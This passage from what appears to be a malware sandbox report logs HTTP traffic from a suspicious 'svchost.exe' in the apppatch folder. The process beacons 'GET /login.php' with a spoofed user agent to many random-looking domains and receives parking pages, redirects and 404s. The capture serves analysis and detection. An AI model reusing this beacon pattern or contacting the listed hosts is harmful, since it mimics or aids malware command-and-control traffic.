                                                                                                                                                                                                          Host: pupycag.com
Nov 11, 2024 18:24:10.877619028 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49725 | 3.94.10.34 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:10.458292007 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygynud.com
Nov 11, 2024 18:24:10.885205984 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49726 | 103.150.10.48 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:10.620506048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Nov 11, 2024 18:24:11.402950048 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:11 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:24:12.189264059 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Nov 11, 2024 18:24:12.460268021 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:24:31.273379087 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Nov 11, 2024 18:24:31.543575048 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:24:32.559969902 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Nov 11, 2024 18:24:32.831363916 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:32 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49728 | 106.15.232.163 | 8000 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:11.412297964 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
Nov 11, 2024 18:24:12.187829971 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:12.462639093 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
Nov 11, 2024 18:24:12.730094910 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:31.560908079 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
Nov 11, 2024 18:24:31.829479933 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:32.834279060 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
Nov 11, 2024 18:24:33.137892008 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:33 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49730 | 76.223.67.189 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:16.179394007 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qexyhuv.com
Nov 11, 2024 18:24:16.605503082 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49731 | 64.225.91.73 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:16.223375082 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galynuh.com
Nov 11, 2024 18:24:16.769535065 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49732 | 44.221.84.105 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:16.343624115 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyciz.com
Nov 11, 2024 18:24:16.770819902 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49734 | 103.224.182.252 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:16.469979048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
Nov 11, 2024 18:24:17.050568104 CET | 338 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          set-cookie: __tad=1731345856.5179536; expires=Thu, 09-Nov-2034 17:24:16 GMT; Max-Age=315360000
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20241112-0424-16c6-a16f-217434b104d2
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49733 | 103.224.212.210 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:16.471121073 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
Nov 11, 2024 18:24:17.039020061 CET | 340 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          set-cookie: __tad=1731345856.5241611; expires=Thu, 09-Nov-2034 17:24:16 GMT; Max-Age=315360000
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49735 | 154.85.183.50 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:16.621033907 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Nov 11, 2024 18:24:17.440803051 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:24:17.445523977 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Nov 11, 2024 18:24:17.731031895 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:24:37.017805099 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Nov 11, 2024 18:24:37.303112984 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:24:37.565736055 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Nov 11, 2024 18:24:37.871067047 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49736 | 64.190.63.136 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:17.096453905 CET | 348 | OUT | GET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
Nov 11, 2024 18:24:17.721149921 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kFstV9mNkok77JXzPm2+LYY2u3fcBlH+WgCWFAgfJC4qpbyQ9UHZbK0ZHMtbCnOsnq2NU/L5q6ydAOMWSPRJyg==
                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7596689c44-prw7b
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Ascii: 308<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kFstV9mNkok77JXzPm2+LYY2u3fcBlH+WgCWFAgfJC4qpbyQ9UHZbK0ZHMtbCnOsnq2NU/L5q6ydAOMWSPRJyg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49737 | 199.59.243.227 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:17.421536922 CET | 350 | OUT | GET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.873805046 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1230
                                                                                                                                                                                                          x-request-id: a5572c25-6032-467b-b015-10575c4e4ea5
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u9Ug286W4Xj/jnzTjTUeKhYi7HXj52Ps61Cz7giKm0Jf2EPzSGemCX98HmK5Y/L/skqAu+Wqjo9JnyRRikdu8w==
                                                                                                                                                                                                          set-cookie: parking_session=a5572c25-6032-467b-b015-10575c4e4ea5; expires=Mon, 11 Nov 2024 17:39:17 GMT; path=/
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u9Ug286W4Xj/jnzTjTUeKhYi7HXj52Ps61Cz7giKm0Jf2EPzSGemCX98HmK5Y/L/skqAu+Wqjo9JnyRRikdu8w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:24:17.873831987 CET | 664 | IN
Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTU1NzJjMjUtNjAzMi00NjdiLWIwMTUtMTA1NzVjNGU0ZWE1IiwicGFnZV90aW1lIjoxNzMxMzQ1ODU3LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49739 | 64.225.91.73 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:18.367106915 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyhyg.com
